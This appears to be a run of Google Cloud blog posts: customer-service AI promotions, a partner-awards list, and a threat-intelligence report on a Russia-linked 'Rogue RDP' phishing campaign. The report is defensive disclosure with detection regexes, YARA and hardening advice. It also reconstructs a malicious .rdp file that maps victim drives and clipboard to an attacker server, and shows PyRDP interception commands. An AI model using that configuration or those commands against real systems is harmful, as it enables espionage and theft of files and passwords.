Verizon’s Personal Research Assistant provides the company’s 28,000 customer care representatives with the information they need to answer a customer’s question instantly, personalized to that customer’s unique needs. Able to answer 95% of questions, the Personal Research Assistant reduces cognitive load so care representatives can focus on the customer, leading to faster and more satisfying resolutions.
“At Verizon, we’re focused on transforming every customer interaction into a moment of genuine connection,” said Sampath Sowmyanarayan, chief executive officer, Verizon Consumer Group. “Google’s Customer Engagement Suite allows us to deliver faster, more personalized service, significantly reducing call times and empowering our team to focus on what truly matters: our customers. This human-in-the-loop technology is not just about ease and simplicity; it’s about building lasting loyalty through exceptional experiences.”
Wendy’s and Mercedes-Benz deliver exceptional conversational experiences with vertical AI agents
We are also helping companies deliver great customer experiences beyond the contact center — meeting customers where they are, whether it’s in-store, in vehicles, or on personal devices like smartphones. We do this by providing readily deployable vertical AI agents that address specific real-world use cases.
These include the Food Ordering AI Agent, which delivers accurate, consistent, multilingual ordering experiences, and the Automotive AI Agent, which offers deeply personalized, in-vehicle experiences.
Wendy’s is expanding their FreshAI deployment across 24 states. This drive-thru ordering system uses our Food Ordering AI Agent to handle 50,000 orders daily, in multiple languages, with a 95% success rate.
Mercedes-Benz is providing advanced conversational capabilities, including conversational search and navigation, in the new CLA series this year by integrating our Automotive AI Agent into its MBUX Virtual Assistant.
Take the next step
Read more about how organizations of all sizes across all industries are transforming customer experience with Customer Engagement Suite in this recent blog.
Watch the Google NEXT keynote and join us at the AI in Action showcase for a live demonstration of the new Conversational Agents product.
Schedule a free consultation with Google’s AI specialists to identify the specific use cases and applications that can help your organization achieve similar business impact.
It’s an honor to announce the 2025 Google Cloud Partner of the Year winners!
It takes a lot to build great AI and cloud technology. Advancements and innovation come from collaboration, and Google Cloud has thousands of partners to make this happen. Among these, we’re excited to recognize dozens who take our work to the next level. These distinguished partners have demonstrated incredible dedication, innovation, and collaboration in delivering impactful solutions that drive success for our customers. Their contributions to the Google Cloud community are truly remarkable and deserve to be recognized.
Please join us in congratulating the winners in the following categories on their outstanding achievements.
Global
This award celebrates top global partners who exemplify excellence in their category, driving innovation and delivering industry-leading solutions with Google Cloud. With a customer-first approach, these partners have demonstrated outstanding leadership, impact, and commitment to transforming businesses worldwide.
Country
This award honors top partners who have demonstrated expertise in leveraging their services and solutions in their country or region to drive sales and deliver outstanding outcomes for Google Cloud customers.
Industry Solutions
Partners receiving this award have leveraged Google Cloud capabilities to create comprehensive and compelling solutions that made a significant impact in one or more industries across multiple regions.
Technology
This award recognizes partners who used a winning combination of Google Cloud technology in a specific technology segment to deliver innovative solutions and customer satisfaction.
Business Applications
Winners of this award have leveraged Google Cloud capabilities to create comprehensive and compelling technology solutions that made a significant impact in one industry across multiple regions.
Artificial Intelligence
This award recognizes partners who helped customers leverage generative AI in 2024 to achieve outstanding success through Google Cloud technology.
Data & Analytics
Partners receiving this award have expertly migrated or deployed new Google Cloud data analytics solutions to help customers extract actionable insights from their data, fueling business transformation.
Databases
This award recognizes partners who have successfully implemented and optimized Google Cloud’s database solutions, enabling their customers to manage data efficiently, securely, and at scale.
Google Workspace
This category honors partners who have excelled in driving sales and delivering outstanding services for Google Workspace, empowering customers with transformative solutions for collaboration and productivity.
Infrastructure Modernization
This award recognizes partners who have helped customers modernize their infrastructure by leveraging Google Cloud’s innovative solutions to increase agility, scalability, and cost-efficiency.
Public Sector
Winners of this award have provided exceptional service and enabled the success of their public sector customers by innovating, building, and delivering the right combination of solutions.
Security
This category honors partners who have effectively implemented Google Cloud’s security solutions, safeguarding their customers’ data and infrastructure from evolving threats.
Talent Development
Partners receiving this award have demonstrated a commitment to growing their team’s cloud skills through training, upskilling, and reskilling their workforce on leading-edge technology with Google Cloud certifications.
Training
Winners of this award have provided exceptional training services and enabled customer success by innovating, building, and delivering the right combination of Google Cloud solutions through learning.
Social Impact
This award recognizes partners who have demonstrated exceptional commitment to driving positive social impact through innovative solutions and initiatives within their organizations.
Once again, congratulations to our 2025 Google Cloud Partner of the Year winners. It’s our privilege to recognize you for all of the groundbreaking work that you do. We look forward to another future-defining year of innovation and collaboration in the cloud.
In October 2024, Google Threat Intelligence Group (GTIG) observed a novel phishing campaign targeting European government and military organizations that was attributed to a suspected Russia-nexus espionage actor we track as UNC5837. The campaign employed signed .rdp file attachments to establish Remote Desktop Protocol (RDP) connections from victims’ machines. Unlike typical RDP attacks focused on interactive sessions, this campaign creatively leveraged resource redirection (mapping victim file systems to the attacker’s servers) and RemoteApps (presenting attacker-controlled applications to victims). Evidence suggests this campaign may have involved the use of an RDP proxy tool like PyRDP to automate malicious activities such as file exfiltration and clipboard capture. This technique has been previously dubbed “Rogue RDP.”
The campaign likely enabled attackers to read victim drives, steal files, capture clipboard data (including passwords), and obtain victim environment variables. While we did not observe direct command execution on victim machines, the attackers could present deceptive applications for phishing or further compromise. The primary objective of the campaign appears to be espionage and file theft, though the full extent of the attacker’s capabilities remains uncertain. This campaign serves as a stark reminder of the security risks associated with obscure RDP functionalities, underscoring the importance of vigilance and proactive defense.
Introduction
Remote Desktop Protocol (RDP) is a legitimate Windows service that has been well-researched by the security community. However, most of the security community’s existing research focuses on the adversarial use of RDP to control victim machines via interactive sessions.
This campaign included use of RDP that was not focused on interactive control of victim machines. Instead, adversaries leveraged two lesser-known features of the RDP protocol to present an application (the nature of which is currently unknown) and access victim resources. Given the low prevalence of this tactic, technique, and procedure (TTP) in previous reporting, we seek to explore the technical intricacies of adversary tradecraft abusing the following functionality of RDP:
RDP Property Files (.rdp configuration files)
Resource redirection (e.g. mapping victim file systems to the RDP server)
RemoteApps (i.e. displaying server-hosted applications to victim)
Additionally, we will shed light on PyRDP, an open-source RDP proxy tool that offers attractive automation capabilities to attacks of this nature.
By examining the intricacies of the tradecraft observed, we gain not only a better understanding of existing campaigns that have employed similar tradecraft, but of attacks that may employ these techniques in the future.
Campaign Operations
This campaign tracks a wave of suspected Russian espionage activity targeting European government and military organizations via widespread phishing. Google Threat Intelligence Group (GTIG) attributes this activity to a suspected Russia-nexus espionage actor group we refer to as UNC5837. The Computer Emergency Response Team of Ukraine (CERT-UA) reported this campaign on Oct. 29, 2024, noting the use of mass-distributed emails with .rdp file attachments among government agencies and other Ukrainian organizations. This campaign has also been documented by Microsoft, Trend Micro, and Amazon.
The phishing email in the campaign claimed to be part of a project in conjunction with Amazon, Microsoft, and the Ukrainian State Secure Communications and Information Security Agency. The email included a signed .rdp file attachment purporting to be an application relevant to the described project. Unlike more common phishing lures, the email explicitly stated that no personal data needed to be provided, and that if any errors occurred while running the attachment, they should be ignored, since an error report would be generated automatically.
Figure 1: Campaign email sample
Executing the signed attachment initiates an RDP connection from the victim’s machine. The attachment is signed with a Let’s Encrypt certificate issued to the domain the RDP connection is established with. The signed nature of the file bypasses the typical yellow warning banner, which could otherwise alert the user to a potential security risk. More information on signature-related characteristics of these files is covered in a later section.
The malicious .rdp configuration file specifies that, when executed, an RDP connection is initiated from the victim’s machine while granting the adversary read & write access to all victim drives and clipboard content. Additionally, it employs the RemoteApp feature, which presents a deceptive application titled “AWS Secure Storage Connection Stability Test” to the victim’s machine. This application, hosted on the attacker’s RDP server, masquerades as a locally installed program, concealing its true, potentially malicious nature. While the application’s exact purpose remains undetermined, it may have been used for phishing or to trick the user into taking action on their machine, thereby enabling further access to the victim’s machine.
Further analysis suggests the attacker may have used an RDP proxy tool like PyRDP (examined in later sections), which can automate malicious activities such as file exfiltration and clipboard capture, including potentially sensitive data like passwords. While we cannot confirm the use of an RDP proxy tool, the ease of access to and the functionality offered by such tools make them an attractive option for this campaign. Regardless of whether such a tool was used, it would be bound by the permissions granted by the RDP session. At the time of writing, we are not aware of an RDP proxy tool that exploits vulnerabilities in the RDP protocol; such tools instead provide enhanced control over the established connection.
The techniques seen in this campaign, combined with the complexity of how they interact with each other, make it difficult for incident responders to assess the true impact to victim machines. Furthermore, the number of artifacts left for post-mortem analysis is relatively small compared to other attack vectors. Because existing research on the topic is speculative about how much control an attacker gains over the victim, we sought to dive deeper into the technical details of the technique’s components. While the full modus operandi cannot be conclusively determined, UNC5837’s primary objective appears to be espionage and file theft.
Deconstructing the Attack: A Deep Dive into RDP Techniques
Remote Desktop Protocol
RDP is used for communication between the Terminal Server and the Terminal Server Client. RDP works with the concept of “virtual channels,” which are capable of carrying presentation data, keyboard/mouse activity, clipboard data, serial device information, and more. Given these capabilities, as an attack vector, RDP is commonly seen as a route for attackers in possession of valid victim credentials to gain full graphical user interface (GUI) access to a machine. However, the protocol also supports other capabilities that facilitate less conventional attack techniques.
RDP Configuration Files
RDP has a number of properties that can be set to customize the behavior of a remote session (e.g., IP to connect to, display settings, certificate options). While most are familiar with configuring RDP sessions via a traditional GUI (mstsc.exe), these properties can also be defined in a configuration file with the .rdp extension which, when executed, achieves the same effect.
The following .rdp file was seen as an email attachment (SHA256): ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46
An excerpt of this .rdp file is displayed in Figure 3 with annotations describing some of the configuration settings.
When executed, this configuration file initiates an RDP connection to the malicious command-and-control (C2 or C&C) server eu-southeast-1-aws[.]govtr[.]cloud and redirects all drives, printers, COM ports, smart cards, WebAuthn requests (e.g., security key), clipboard, and point-of-sale (POS) devices to the C2 server.
Setting the remoteapplicationmode parameter to 1 switches the session from a “traditional” interactive GUI session to one that presents the victim with only a single application from the RDP server. The RemoteApp, titled AWS Secure Storage Connection Stability Test v24091285697854, resides on the RDP server and is presented to the victim in a windowed popup. The icon used to represent this application (on the Windows taskbar, for example) is defined by remoteapplicationicon. The Windows environment variables %USERPROFILE%, %COMPUTERNAME%, and %USERDNSDOMAIN% are passed as command-line arguments to the application. Because the property remoteapplicationexpandcmdline:i:0 is set, the environment variables sent to the RDP server are those of the client (i.e., the victim), effectively performing initial reconnaissance upon connection.
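For reference, a minimal illustrative reconstruction of such a configuration is shown below. Only the domain, RemoteApp title, and command-line variables are taken from the observed file; the remaining values are representative placeholders using standard .rdp property syntax.
full address:s:eu-southeast-1-aws[.]govtr[.]cloud
alternate full address:s:eu-southeast-1-aws[.]govtr[.]cloud
remoteapplicationmode:i:1
remoteapplicationname:s:AWS Secure Storage Connection Stability Test v24091285697854
remoteapplicationprogram:s:<server-side program alias>
remoteapplicationicon:s:<icon shown on the victim taskbar>
remoteapplicationcmdline:s:%USERPROFILE% %COMPUTERNAME% %USERDNSDOMAIN%
remoteapplicationexpandcmdline:i:0
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectcomports:i:1
redirectsmartcards:i:1
redirectwebauthn:i:1
signature:s:<base64-encoded signature blob>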
Lastly, the signature property holds the encoded signature that signs the .rdp file. The signature in this case was generated using Let’s Encrypt. Interestingly, the SSL certificate used to sign the file is issued for the very domain the RDP connection is made to. Consider, for example, the file with SHA256: 1c1941b40718bf31ce190588beef9d941e217e6f64bd871f7aee921099a9d881.
Figure 4: Signature property within .rdp file
Tools like rdp_holiday can be used to decode the public certificate embedded within the file in Figure 4.
Figure 5: .rdp file parsed by rdp_holiday
The certificate is an SSL certificate issued for the domain the RDP connection is made to. This can be correlated with the RDP properties full address / alternate full address.
alternate full address:s:eu-north-1-aws.ua-gov.cloud
full address:s:eu-north-1-aws.ua-gov.cloud
Figure 6: Remote address RDP properties
.rdp files targeting other victims also exhibited similar certificate behavior.
In legitimate scenarios, an organization could sign RDP connections with SSL certificates tied to its own certificate authority. An organization could also disable execution of .rdp files from unsigned and unknown publishers. The corresponding GPO can be found under Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client -> Allow .rdp files from unknown publishers.
Figure 7: GPO policy for disabling unknown and unsigned .rdp file execution
The policy in Figure 7 can optionally further be coupled with the “Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers” policy (within the same location) to add certificates as Trusted Publishers.
From an attacker’s perspective, existence of a signature allows the connection prompt to look less suspicious (i.e., without the usual yellow warning banner), as seen in Figure 8.
This RDP configuration approach is especially notable because it maps resources from both the adversary and victim machines:
The RemoteApp presented to the victim resides on the adversary-controlled RDP server, not the client/victim machine.
The Windows environment variables forwarded to the RDP server as command-line arguments are those of the client/victim.
Victim file system drives are forwarded and accessible as remote shares on the RDP server. Only the drives accessible to the victim user initiating the RDP connection are exposed, and the RDP server by default has the ability to read and write to them.
Victim clipboard data is accessible to the RDP server. If the victim machine runs in a virtualized environment that shares its clipboard between host and guest, the host’s clipboard is forwarded to the RDP server as well.
Keeping track of which activity happens on the victim machine and which happens on the server helps assess the level of control an attacker-controlled RDP server grants over the victim machine. A deeper understanding of the RDP protocol’s functionality, particularly resource redirection and RemoteApp execution, is crucial for analyzing tools like PyRDP. PyRDP operates within the defined parameters of the RDP protocol, leveraging its features rather than exploiting vulnerabilities, which makes understanding these nuances essential for comprehending PyRDP’s capabilities and potential impact.
More information on RDP parameters can be found here and here.
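As a practical illustration of these properties, the following minimal Python sketch parses a .rdp file’s key:type:value entries and flags the combination highlighted in this campaign (RemoteApp mode, broad drive redirection, clipboard redirection). The input file name is hypothetical; this is a triage aid under those assumptions, not a detection tool.

from pathlib import Path

# Properties this campaign combined (see the excerpts above).
RISKY = {
    "remoteapplicationmode": "1",  # present a RemoteApp instead of a full desktop
    "drivestoredirect": "*",       # map all client drives to the RDP server
    "redirectclipboard": "1",      # forward the client clipboard to the server
}

def parse_rdp(path):
    """Parse .rdp 'key:type:value' lines into a dict keyed by property name."""
    props = {}
    for line in Path(path).read_text(errors="ignore").splitlines():
        key, _, rest = line.partition(":")
        vtype, _, value = rest.partition(":")
        if key and vtype:
            props[key.strip().lower()] = value.strip()
    return props

props = parse_rdp("suspicious.rdp")  # hypothetical input file
for key, risky_value in RISKY.items():
    if props.get(key) == risky_value:
        print(f"[!] {key} = {risky_value}")
print("[*] connects to:", props.get("full address") or props.get("alternate full address"))
print("[*] signed:", "signature" in props)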
Resource Redirection
The campaign’s .rdp configuration file set several RDP session properties for the purpose of resource redirection.
RDP resource redirection enables the utilization of peripherals and devices connected to the local system within the remote desktop session, allowing access to resources such as:
Printers
Keyboards and mice
Drives (hard drives, CD/DVD drives, etc.)
Serial ports
Hardware security keys, such as YubiKeys (via smart card and WebAuthn redirection)
Audio devices
Clipboards (for copy-pasting between local and remote systems)
Resource redirection in RDP is facilitated through Microsoft’s “virtual channels.” The communication happens via special RDP packets, called protocol data units (PDUs), that mirror changes between the victim and attacker machines for as long as the connection is active. More information on virtual channels and PDU structures can be found in MS-RDPERP.
Typically, virtual channels employ encrypted communication streams. However, PyRDP is capable of capturing the initial RDP handshake sequences and hence decrypting the RDP communication streams.
Figure 9: Victim’s mapped-drives as seen on an attacker’s RDP server
Remote Programs / RemoteApps
RDP has an optional feature called RemoteApp programs: applications hosted on the remote server that behave like windowed applications on the client system, which in this case is a victim machine. A malicious RemoteApp can thus appear to the victim as a local application without ever touching the victim machine’s disk.
Figure 10 is an example of the MS Paint application presented as a RemoteApp, as seen by a test victim machine. The application does not exist on the victim machine but is presented to appear like a native application. Notice that there is no banner or top dock indicating an RDP connection, as one would expect in an interactive session; the only indicator is the RDP symbol on the taskbar.
Figure 10: RDP RemoteApp (MsPaint.exe) hosted on the RDP server, as seen on a test victim machine
All resources used by a RemoteApp belong to the RDP server. Additionally, if victim drives are mapped to the RDP server, the RemoteApp can access them as well.
PyRDP
While the use of a tool like PyRDP in this campaign cannot be confirmed, the automation capabilities it offers make it an attractive option worth diving deeper into. A closer look at PyRDP will illuminate how such a tool could be useful in this context.
PyRDP is an open-source, Python-based, man-in-the-middle (MiTM) RDP proxy toolkit designed for offensive engagements.
Figure 11: PyRDP as a MiTM tool
PyRDP runs on a host (the MiTM server) and is pointed at a server running Windows RDP. Victims connect to the MiTM server with no indication that they are connected to a relay, while PyRDP seamlessly relays the connection to the final RDP server and provides enhanced capabilities over the connection, such as:
Stealing NTLM hashes of the credentials used to authenticate to the RDP server
Running commands on the RDP server after the user connects
Capturing the user’s clipboard
Enumerating mapped drives
Streaming, recording (in video format), and taking over sessions
It’s important to note that, from our visibility, PyRDP does not exploit vulnerabilities or expose a new weakness. Instead, it provides granular control over functionality native to the RDP protocol.
Password Theft
PyRDP is capable of stealing passwords regardless of whether Network Level Authentication (NLA) is enabled. If NLA is enabled, it captures the NTLM hash via the NLA exchange, as seen in Figure 12. It does so by interrupting the original RDP connection sequence and completing part of it on its own, thereby allowing it to capture hashed credentials. The technique works in a similar way to Responder. More information about how PyRDP does this can be found here.
Figure 12: RDP server user NTLMv2 Hashes recorded by PyRDP during user authentication
Alternatively, if NLA is not enabled, PyRDP interprets the keyboard scan codes it receives while a user authenticates and converts them into virtual key codes, thereby “guessing” the supplied password. The authors of the tool refer to this as their “heuristic method” of detecting passwords.
Figure 13: Plaintext password detection without NLA
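As a toy illustration of that heuristic (this is not PyRDP’s actual code), mapping received scan codes back to characters looks roughly like the following sketch; the scan-code values are from the standard PC keyboard “set 1” layout.

# Toy reconstruction of keystrokes from keyboard scan codes (set 1 layout).
SCANCODE_TO_CHAR = {
    0x10: "q", 0x11: "w", 0x12: "e", 0x13: "r", 0x14: "t",
    0x1E: "a", 0x1F: "s", 0x20: "d", 0x21: "f", 0x22: "g",
    0x2C: "z", 0x2D: "x", 0x2E: "c", 0x2F: "v", 0x30: "b",
    0x02: "1", 0x03: "2", 0x04: "3", 0x05: "4",
}

def guess_typed_text(scancodes):
    # Skip codes we cannot map (modifiers, key releases, and so on).
    return "".join(SCANCODE_TO_CHAR.get(code, "") for code in scancodes)

# A user typing "cat1" at the login prompt emits roughly these key-press codes:
print(guess_typed_text([0x2E, 0x1E, 0x14, 0x02]))  # -> "cat1"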
When the user authenticates to the RDP server, PyRDP captures the credentials used to log in. When the RDP server is controlled by the adversary (as in this campaign), this feature adds little impact, since the captured credentials belong to the actor-controlled server. It becomes impactful, however, when an attacker performs an MiTM attack against an end server they do not own.
It is worth noting that, during setup, PyRDP allows the attacker to supply credentials, which are then used to authenticate to the RDP server. This way, the user is never prompted for credentials and is instead presented directly with the RemoteApp. In this campaign, given that the username RDP property was empty, the RDP server was attacker-controlled, and the RemoteApp was core to the operation’s storyline, we suspect a tool like PyRDP was used to bypass the user authentication prompt and directly present the AWS Secure Storage Connection Stability Test v24091285697854 RemoteApp to the victim.
Finally, PyRDP automatically captures the RDP challenge during connection establishment. This enables RDP packets to be decrypted if raw network captures are available, revealing more granular details about the RDP session.
Command Execution
PyRDP allows for commands to be executed on the RDP server. However, it does not allow for command execution on the victim’s machine. At the time of deployment, commands to be executed can be supplied to PyRDP in the following ways:
MS-DOS (cmd.exe)
PowerShell commands
PowerShell scripts hosted on the PyRDP server file system
PyRDP executes the command by freezing/blocking the RDP session for a given amount of time while the command executes in the background; to the user, it simply looks like the session froze. When deploying the PyRDP MiTM server, the attacker specifies:
What command to execute (in one of the aforementioned three ways)
How long to block/freeze the user session for
How long the command will take to complete
PyRDP can detect user connections and disconnections, but it cannot detect when a user authenticates to the RDP server. Because a user may connect to an RDP session without immediately logging in, PyRDP cannot determine authentication status, so the attacker must estimate a waiting period between the user connecting and the command executing. The attacker must likewise define how long the session is frozen during command execution, since PyRDP has no way of knowing when the command completes.
The example in Figure 14 relays incoming connections to an RDP server at 192.168.1.2, starts the calc.exe process on the RDP server 20 seconds after the user connects, and freezes the user session for five seconds while the command executes.
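Since Figure 14 is not reproduced here, a hedged reconstruction of that invocation, using the payload options documented by the PyRDP project (delay and duration are in milliseconds), would look like:

pyrdp-mitm.py 192.168.1.2 --payload "calc" --payload-delay 20000 --payload-duration 5000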
A clever attacker can use this capability of PyRDP to plant malicious files on a redirected drive, even though PyRDP cannot directly execute them on the victim machine. This could facilitate dropping malicious files in locations that enable further persistent access (e.g., via DLL sideloading, or malware in startup locations). Defenders can hunt for this activity by monitoring file creations originating from mstsc.exe; we dive deeper into practical detection strategies later in this post.
Clipboard Capture
PyRDP automatically captures the clipboard of the victim user for as long as the RDP connection is active. This is one point where the attacker’s control extends beyond the RDP server and onto the victim machine.
Note that if a user connects from a virtual environment (e.g., VMware) and the host machine’s clipboard is mapped to the virtual machine, it would also be forwarded to the RDP session. This can allow the attacker to capture clipboard content from the host and guest machine combined.
Scraping/Browsing Client Files
With file redirection enabled, PyRDP can crawl the target system and save all or specified folders to the MiTM server if instructed at setup using the --crawl option. If the --crawl option is not specified at setup, PyRDP will still capture files, but only those accessed by the user during the RDP session, such as environment files. During an active connection, an attacker can also connect to the live stream and freely browse the target system’s file system via the PyRDP-player GUI to download files (see Figure 15).
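For example, enabling the crawler at setup is a single documented option (the target address here is illustrative):

pyrdp-mitm.py 192.168.1.2 --crawl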
It is worth noting that while PyRDP does not explicitly present the ability to place files on the victim’s mapped drives, the RDP protocol itself does allow it. Should an adversary misuse that capability, it would be outside the scope of PyRDP.
Stream/Capture/Intercept RDP Sessions
PyRDP can record RDP sessions for later playback. An attacker can optionally stream each intercepted connection and connect to the stream port to interact with the live RDP session. The attacker can also take control of the session and perform actions on the target system; when this happens, the RDP connection hangs for the user, similar to the freeze observed during command execution.
Streaming, if enabled with the -i option, defaults to TCP port 3000 (configurable). Live connections are streamed on a locally bound port, accessible via the included pyrdp-player script GUI. Upon completion of a connection, an .mp4 recording of the session can be produced by PyRDP.
Detection and Hardening
This section focuses on collecting forensic information, hardening systems, and developing detections for the RDP techniques used in the campaign.
Security detections detailed in this section are already integrated into the Google SecOps Enterprise+ platform. In addition, Google maintains similar proactive measures to protect Gmail and Google Workspace users.
Log Artifacts
Default Windows Machine
During testing, limited evidence was recovered on default Windows systems after drive redirection and RemoteApp interaction. In practice, it would be difficult to distinguish between a traditional RDP connection and one with drive redirection and/or RemoteApp usage on a default Windows system. From a forensic perspective, the following patterns are of moderate interest:
Creation of the following registry keys upon connection, which give insight into the attacker server address and the username used:
HKU\S-1-5-21-4272539574-4060845865-869095189-1000\SOFTWARE\Microsoft\Terminal Server Client\Servers\<attacker_IP_address>
HKU\S-1-5-21-4272539574-4060845865-869095189-1000\SOFTWARE\Microsoft\Terminal Server Client\Servers\<attacker_server>\UsernameHint: "<username used for connection>"
The information contained in the Windows Event Logs (Microsoft-Windows-TerminalServices-RDPClient/Operational):
Event ID 1102: Logs attacker server IP address
Event ID 1027: Logs attacker server domain name
Event ID 1029: Logs the username used to authenticate, in the format base64(sha256(username)); see the sketch below.
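To pivot from an Event ID 1029 value back to a candidate username, the hash can be recomputed. A minimal sketch follows, assuming the username is hashed in its UTF-16LE encoding (the convention reported in public RDP forensics research):

import base64
import hashlib

def event_1029_hash(username):
    # Event ID 1029 logs base64(sha256(username)); the UTF-16LE encoding of
    # the username is an assumption noted in the lead-in above.
    digest = hashlib.sha256(username.encode("utf-16-le")).digest()
    return base64.b64encode(digest).decode()

# Compare against values logged in Microsoft-Windows-TerminalServices-RDPClient/
# Operational to test candidate usernames.
print(event_1029_hash("Administrator"))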
Heightened Logging Windows Machine
With enhanced logging capabilities (e.g., Sysmon, Windows advanced audit logging, EDR), artifacts indicative of file write activity on the target system may be present. This was tested and validated using Sysmon file creation events (event ID 11).
Victim system drives can be mapped to the RDP server via RDP resource redirection, enabling both read and write operations. Tools such as PyRDP allow for crawling and downloading the entire file directory of the target system.
When files are written to the target system using RDP resource redirection, the originating process is observed to be C:\Windows\system32\mstsc.exe. A retrospective analysis of a large set of representative enhanced logs indicates that file write events originating from mstsc.exe are a common occurrence, but they display a pattern that can be excluded from alerting.
For example, multiple arbitrarily named terminal server-themed .tmp files matching the regex pattern _TS[A-Z0-9]{4}\.tmp (e.g., _TS4F12.tmp) are written to the user’s AppData\Local\Temp directory throughout the duration of the connection.
Additionally, several file writes and folder creations related to the protocol occur in the AppData\Local\Microsoft\Terminal Server Client directory.
Depending upon the RDP session, excluding these protocol-specific file writes could help manage the number of events to triage and spot potentially interesting ones. It’s worth noting that the Windows system by default will delete temporary folders from the remote computer upon logoff. This does not apply to the file operations on redirected drives.
Should file-read logging be enabled, file reads originating from mstsc.exe could warrant suspicion. It is worth noting that file-read events are noisy by nature, due to the way the Windows subsystem operates; caution should be taken before enabling such logging.
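A minimal hunting sketch along these lines follows, assuming Sysmon event ID 11 records exported as JSON lines with Image and TargetFilename fields (the export format and file name are hypothetical):

import json
import re

# Benign, protocol-generated writes described above; everything else that
# mstsc.exe writes is worth a closer look.
BENIGN = [
    re.compile(r"\\AppData\\Local\\Temp\\_TS[A-Z0-9]{4}\.tmp$", re.I),
    re.compile(r"\\AppData\\Local\\Microsoft\\Terminal Server Client\\", re.I),
]

def interesting_writes(sysmon_json_path):
    with open(sysmon_json_path) as f:
        for line in f:
            event = json.loads(line)
            if not event.get("Image", "").lower().endswith("\\mstsc.exe"):
                continue
            target = event.get("TargetFilename", "")
            if not any(rx.search(target) for rx in BENIGN):
                yield target

for path in interesting_writes("sysmon_id11.jsonl"):  # hypothetical export
    print(path)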
.rdp File via Email
The .rdp configuration file within the campaign was observed being sent as an email attachment. While it’s not uncommon for IT administrators to send .rdp files over email, the presence of an external address in the attachment may be an indicator of compromise. The following regex patterns, when run against an organization’s file creation events, can indicate .rdp files being run directly from Outlook email attachments:
/\\AppData\\Local\\Microsoft\\Windows\\(INetCache|Temporary Internet Files)\\Content\.Outlook\\[A-Z0-9]{8}\\[^\\]{1,255}\.rdp$/

/\\AppData\\Local\\Packages\\Microsoft\.Outlook_[a-zA-Z0-9]{1,50}\\.{0,120}\\[^\\]{1,80}\.rdp$/

/\\AppData\\Local\\Microsoft\\Olk\\Attachments\\([^\\]{1,50}\\){0,5}[^\\]{1,80}\.rdp$/
System Hardening
The following options could assist with hardening enterprise environments against RDP attack techniques.
Network-level blocking of outgoing RDP traffic to public IP addresses
Disable resource redirection via the Registry
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Terminal Server Client
Allow .rdp files from unknown publishers: Setting this to Disabled prevents users from running unsigned .rdp files as well as ones from untrusted publishers.
Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers: A way to add certificate SHA1s as trusted file publishers
Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host: policies for enabling/disabling:
Resource redirection
Clipboard redirection
Forcing Network Level Authentication
Time limits for active/idle connections
Blocking .rdp file extension as email attachments
The applicability of these measures is subject to the nature of activity within a given environment and what is considered “normal” behavior.
YARA Rules
These YARA rules can be used to detect suspicious RDP configuration files that enable resource redirection and RemoteApps.
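The original rules are not reproduced here, but a minimal sketch of such a rule, keyed on the .rdp property strings discussed above, could look like:

rule Susp_RDP_RemoteApp_DriveRedirect
{
    meta:
        description = "Hedged example: .rdp file enabling RemoteApp mode plus broad resource redirection"
    strings:
        $remoteapp = "remoteapplicationmode:i:1" ascii wide nocase
        $drives = "drivestoredirect:s:*" ascii wide nocase
        $clipboard = "redirectclipboard:i:1" ascii wide nocase
    condition:
        filesize < 10KB and $remoteapp and ($drives or $clipboard)
}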
This campaign demonstrates how common tradecraft can be revitalized with alarming effectiveness through a modular approach. By combining mass emailing, resource redirection, and the creative sleight-of-hand use of RemoteApps, the actor could leverage existing RDP techniques while leaving minimal forensic evidence. This combination of familiar techniques, deployed in an unconventional manner, proved remarkably effective, demonstrating that the true danger of Rogue RDP lies not in the code, but in the con.
In this particular campaign, control over the target system appears limited, with the main capabilities revolving around file theft, clipboard data capture, and access to environment variables; the campaign was most likely aimed at espionage and user manipulation during interaction. Lastly, this campaign once again underscores how readily available red-team tools intended for educational purposes are weaponized by malicious actors with harmful intent.
Acknowledgments
Special thanks to: Van Ta, Steve Miller, Barry Vengerik, Lisa Karlsen, Andrew Thompson, Gabby Roncone, Geoff Ackerman, Nick Simonian, and Mike Stokkel.